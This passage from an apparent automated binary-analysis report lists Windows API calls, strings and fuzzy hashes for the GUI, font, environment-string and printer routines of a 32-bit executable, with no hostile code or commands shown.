                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                      • String ID: 08G
                                      • API String ID: 3843206905-604853322
                                      • Opcode ID: 07563f844e0819c67e4b61401bbddb11fda3beccf18eb196bf6cce1fa347444b
                                      • Instruction ID: c4c161cac4519d59901495873330fd105bcfc6aeb2e51354b89c12a26c229f73
                                      • Opcode Fuzzy Hash: 07563f844e0819c67e4b61401bbddb11fda3beccf18eb196bf6cce1fa347444b
                                      • Instruction Fuzzy Hash: 2A111F5980061591E7352BA4EE0C7A637B4F708701F0444A7E918EBAF0E7FC48C6CBAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00442E24
                                      • CallWindowProcA.USER32 ref: 00442E49
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: 26c12af5cbcce08c49acb5eaa8d2ec29edb3b767065d90b127e6ed7a7b209029
                                      • Instruction ID: 62dcc1c6e14560c69844deece2871627b09cace6882289dd26f64c36300f9445
                                      • Opcode Fuzzy Hash: 26c12af5cbcce08c49acb5eaa8d2ec29edb3b767065d90b127e6ed7a7b209029
                                      • Instruction Fuzzy Hash: AD51DF76A04200AFE310DB44DC84DBBB7B8FBC9761F94452EF94483211E279AD4687A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044317E
                                      • GetClientRect.USER32 ref: 00443199
                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004431CB
                                      • SelectObject.GDI32(?,00000000), ref: 004431D9
                                      • SetBkMode.GDI32(?,00000002), ref: 004431EA
                                      • GetParent.USER32(?), ref: 004431F8
                                      • SendMessageA.USER32(00000000), ref: 004431FF
                                      • SelectObject.GDI32(?,00000000), ref: 00443209
                                      • SelectObject.GDI32(?,00000000), ref: 0044322B
                                      • SelectObject.GDI32(?,00000000), ref: 0044323B
                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00443292
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
                                      • String ID:
                                      • API String ID: 3606012576-0
                                      • Opcode ID: 9ca012edca40cc47656dd8fc06b0c8be1d45db44b344155b869cda9e67462f87
                                      • Instruction ID: ad446790de35d434e0af4c2422187fd24a55ecb3cdc6ca9dba9bb86343039ce5
                                      • Opcode Fuzzy Hash: 9ca012edca40cc47656dd8fc06b0c8be1d45db44b344155b869cda9e67462f87
                                      • Instruction Fuzzy Hash: E84127722043017BE200AB44AC86F7F736CEB85F26F44056EF601961D3DAA9DA0587BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemMetrics.USER32 ref: 00447FEB
                                      • GlobalLock.KERNEL32 ref: 00448075
                                      • CreateDialogIndirectParamA.USER32(?,?,BAADBEEF,00447D7C,00000000), ref: 004480A7
                                        • Part of subcall function 00447997: InterlockedDecrement.KERNEL32(-000000F4), ref: 004479AB
                                      • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0044811E
                                      • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0044812F
                                      • GlobalFree.KERNEL32 ref: 00448138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Global$CreateDecrementDestroyDialogFreeIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                      • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                      • API String ID: 3135555545-2894235370
                                      • Opcode ID: 57dacada1aec1c99090df68a9bb2ff0484b26da2896eae2f356f5e9703eab259
                                      • Instruction ID: 87aad595b5a121b28f3993325f8e45f3d31caeefd3fcaa0a6ba6cf4df756c204
                                      • Opcode Fuzzy Hash: 57dacada1aec1c99090df68a9bb2ff0484b26da2896eae2f356f5e9703eab259
                                      • Instruction Fuzzy Hash: F861917190024ADFEF11EFA5C985AAEBBB1BF08305F10442FF505A6292DB788E45CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B54C
                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B560
                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B58C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5C4
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5E6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5FF
                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B612
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0043B650
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                      • String ID: ahC
                                      • API String ID: 1823725401-4104489344
                                      • Opcode ID: bb360231d674d0e1bf4e3719eb3839b36bdfb8dee904512e0a344f74551a7f9e
                                      • Instruction ID: 9ff38f4521bec964fcc555f15a7dcfeeefb0e4473b68ebd35830e80cafe83057
                                      • Opcode Fuzzy Hash: bb360231d674d0e1bf4e3719eb3839b36bdfb8dee904512e0a344f74551a7f9e
                                      • Instruction Fuzzy Hash: 123106B25042196FD7203F795C8663BB6DCE65D348F11243BF756C3212EB288C818AEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: Arial$Free: %2.2f GB
                                      • API String ID: 0-1109879368
                                      • Opcode ID: e93f71a8e3d96e1550e10923e6b5e44f1a2279a71ff40c7964b2359e7ef2ec91
                                      • Instruction ID: eb13edb1482f8905054ef76cb265a41d331251cc77f0c514155ca40ad738ad96
                                      • Opcode Fuzzy Hash: e93f71a8e3d96e1550e10923e6b5e44f1a2279a71ff40c7964b2359e7ef2ec91
                                      • Instruction Fuzzy Hash: 70C1E870E002189FDB18DFA9C991BEDBBB5BF48344F10816EE50AB7291DB346A45CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetStockObject.GDI32(00000011), ref: 0042EAB2
                                      • GetStockObject.GDI32(0000000D), ref: 0042EABD
                                      • GetObjectA.GDI32(00401D80,0000003C,?), ref: 0042EAEB
                                      • lstrlenA.KERNEL32(?), ref: 0042EB08
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 0042EB2D
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0042EB83
                                      • #253.OLEPRO32(00000020,004616E0,?,?,?,00000001), ref: 0042EBAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Object$Stock$#253ByteCapsCharDeviceMultiWidelstrlen
                                      • String ID:
                                      • API String ID: 2670341580-3916222277
                                      • Opcode ID: 06bda9e9e5254fd34e2a29672d3f64d9e2032c8ac9b40a4d4249f677ee1ccefc
                                      • Instruction ID: b838e9adac91e02d668c291edec9113ebba6c695fccc93279168a93a670aabcf
                                      • Opcode Fuzzy Hash: 06bda9e9e5254fd34e2a29672d3f64d9e2032c8ac9b40a4d4249f677ee1ccefc
                                      • Instruction Fuzzy Hash: 37418BB1D00219DFDB10DFA5C885AEEBBB8FF09304F60406AE905E3251E7789A49CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00444A40
                                      • CallWindowProcA.USER32 ref: 00444A9E
                                        • Part of subcall function 00444630: GetWindowRect.USER32 ref: 00444655
                                        • Part of subcall function 00444630: GetWindow.USER32(?,00000004), ref: 00444672
                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00444ACE
                                      • RemovePropA.USER32 ref: 00444AD6
                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00444ADD
                                      • GlobalDeleteAtom.KERNEL32 ref: 00444AE4
                                        • Part of subcall function 0044460D: GetWindowRect.USER32 ref: 00444619
                                      • CallWindowProcA.USER32 ref: 00444B38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
                                      • String ID: AfxOldWndProc423
                                      • API String ID: 3892049428-1060338832
                                      • Opcode ID: 27eb5d37a3354f064f67a128976f8cf3b178580ea3291a6ab167b8f4f0cce010
                                      • Instruction ID: 095ef9838afe754054dfd5f230bc47fa7256370d20334d7f5ea6544e98676d06
                                      • Opcode Fuzzy Hash: 27eb5d37a3354f064f67a128976f8cf3b178580ea3291a6ab167b8f4f0cce010
                                      • Instruction Fuzzy Hash: D331647280421ABBEF01AFA5DD4AFBF7A78EF85312F00051AF601A2151C73D8911D769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: __ftol$ModeRelease
                                      • String ID: W
                                      • API String ID: 1379597261-655174618
                                      • Opcode ID: fdfbb218934fee8eb8d5bf19f3f87fc033c2d47e1ce60b9ab3e2a1be5fbfc6ec
                                      • Instruction ID: c479fc4d92d1c216cd874968fff61004198bb838e688fa19c13d2defd09eb9c7
                                      • Opcode Fuzzy Hash: fdfbb218934fee8eb8d5bf19f3f87fc033c2d47e1ce60b9ab3e2a1be5fbfc6ec
                                      • Instruction Fuzzy Hash: FA413975A01209EFDB04CF98C599AEEBBB4FF48700F15859AE855AB3A1C734AE10CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetStockObject.GDI32(00000011), ref: 00449653
                                      • GetStockObject.GDI32(0000000D), ref: 0044965B
                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 00449668
                                      • GetDC.USER32(00000000), ref: 00449677
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044968E
                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 0044969A
                                      • ReleaseDC.USER32 ref: 004496A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Object$Stock$CapsDeviceRelease
                                      • String ID: System
                                      • API String ID: 46613423-3470857405
                                      • Opcode ID: 048eb01dacaee6c820a4bd091a3975f33037570a772f28067e8f93139cf52a6b
                                      • Instruction ID: 5b6766bc19c29aa3f8f7e03f7974bbf6190a8cbd55d6f122b8dc0202f2e2110d
                                      • Opcode Fuzzy Hash: 048eb01dacaee6c820a4bd091a3975f33037570a772f28067e8f93139cf52a6b
                                      • Instruction Fuzzy Hash: 7E117031A40318EFFB109BA1DD45FAF3B68AB05B52F004026FA05E62D1D7749D419BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00446E58,00000000,00020000,?,?,00000000), ref: 00446B67
                                      • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446B70
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00446B84
                                      • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446B9F
                                      • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446BBB
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Library$AddressFreeHandleLoadModuleProc
                                      • String ID: COMCTL32.DLL$InitCommonControlsEx
                                      • API String ID: 1437655972-4218389149
                                      • Opcode ID: fac53153985d7d767b38765a7a81842b62a20c8ce16e154e7758a4d868a3114e
                                      • Instruction ID: 19351325aef1320d6205d7a63ba929c021b82d7ab829336d3b2ef766ad711604
                                      • Opcode Fuzzy Hash: fac53153985d7d767b38765a7a81842b62a20c8ce16e154e7758a4d868a3114e
                                      • Instruction Fuzzy Hash: 0FF0F932700B629757115F64DD48E4B72ACEB85752706043AF910D3221DB28DC08877B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,00000100,004614D0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BC3C
                                      • LCMapStringA.KERNEL32(00000000,00000100,004614CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BC58
                                      • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BCA1
                                      • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BCD9
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD31
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD47
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD7A
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BDE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: String$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 352835431-0
                                      • Opcode ID: b9b74135c75423a479d6b220c4b431ed190c34f9baef5eb670389bea63384aac
                                      • Instruction ID: eec907906d50117275dc50c3fb9d9b90c0af71b2f8900a2442081d6721ac0081
                                      • Opcode Fuzzy Hash: b9b74135c75423a479d6b220c4b431ed190c34f9baef5eb670389bea63384aac
                                      • Instruction Fuzzy Hash: 78516931900209ABCF228F95CC45BEF7BB5FF4D751F24512AFA14A2260D33A8C51DBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00441807
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 00441814
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044185C
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00441873
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044188E
                                      • GetWindowLongA.USER32 ref: 004418D2
                                      • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 004418F9
                                      • GetParent.USER32(?), ref: 00441961
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0044199E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                      • String ID:
                                      • API String ID: 1151315845-0
                                      • Opcode ID: 6e13959d56a97a165b7de9cabc345e5dffd73404d52c3e51afe23d1641b7a4eb
                                      • Instruction ID: 005850604defb740b874adb7d8ce02af1d58c8bb670bd6602af5c3a9fcccf914
                                      • Opcode Fuzzy Hash: 6e13959d56a97a165b7de9cabc345e5dffd73404d52c3e51afe23d1641b7a4eb
                                      • Instruction Fuzzy Hash: AD41C3759003059BF720EF14ED45BAB77A8EB44355F00452AF94993272D7B8EC88CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0043B9A6
                                      • GetStdHandle.KERNEL32(000000F4,00461440,00000000,?,00000000,?), ref: 0043BA7C
                                      • WriteFile.KERNEL32(00000000), ref: 0043BA83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: File$HandleModuleNameWrite
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 3784150691-4022980321
                                      • Opcode ID: 24858ae332a1a1c21fd3a99df7b967cd8801d8f0f5c634ef2bb48ee14ab40898
                                      • Instruction ID: 2c0d377a22f8810cc1508e173b3de119adb786e16eb1a8b9c870dce98b567ff5
                                      • Opcode Fuzzy Hash: 24858ae332a1a1c21fd3a99df7b967cd8801d8f0f5c634ef2bb48ee14ab40898
                                      • Instruction Fuzzy Hash: 9E310A72A002186FDF20EA61DC46F9A77ACEF49304F14145BF645E7190F778E9418B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalLock.KERNEL32 ref: 00448772
                                      • lstrcmpA.KERNEL32(?,?), ref: 0044877E
                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00448790
                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004487B3
                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004487BB
                                      • GlobalLock.KERNEL32 ref: 004487C8
                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004487D5
                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004487F3
                                        • Part of subcall function 0044AE07: GlobalFlags.KERNEL32(?), ref: 0044AE11
                                        • Part of subcall function 0044AE07: GlobalUnlock.KERNEL32(?,?,?,0044C95C,?,?,?,?,00420FAF,0046F4E0,?,00411BFB), ref: 0044AE28
                                        • Part of subcall function 0044AE07: GlobalFree.KERNEL32 ref: 0044AE33
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                      • String ID:
                                      • API String ID: 168474834-0
                                      • Opcode ID: c20253ac335b2a8ee8ba3202936b2cdb8691aa8ab60debc34aa857a75018fe98
                                      • Instruction ID: 5148e936cb951f8206727751412b064e1f1b6a39b4c9be85cff580e0d8a97c89
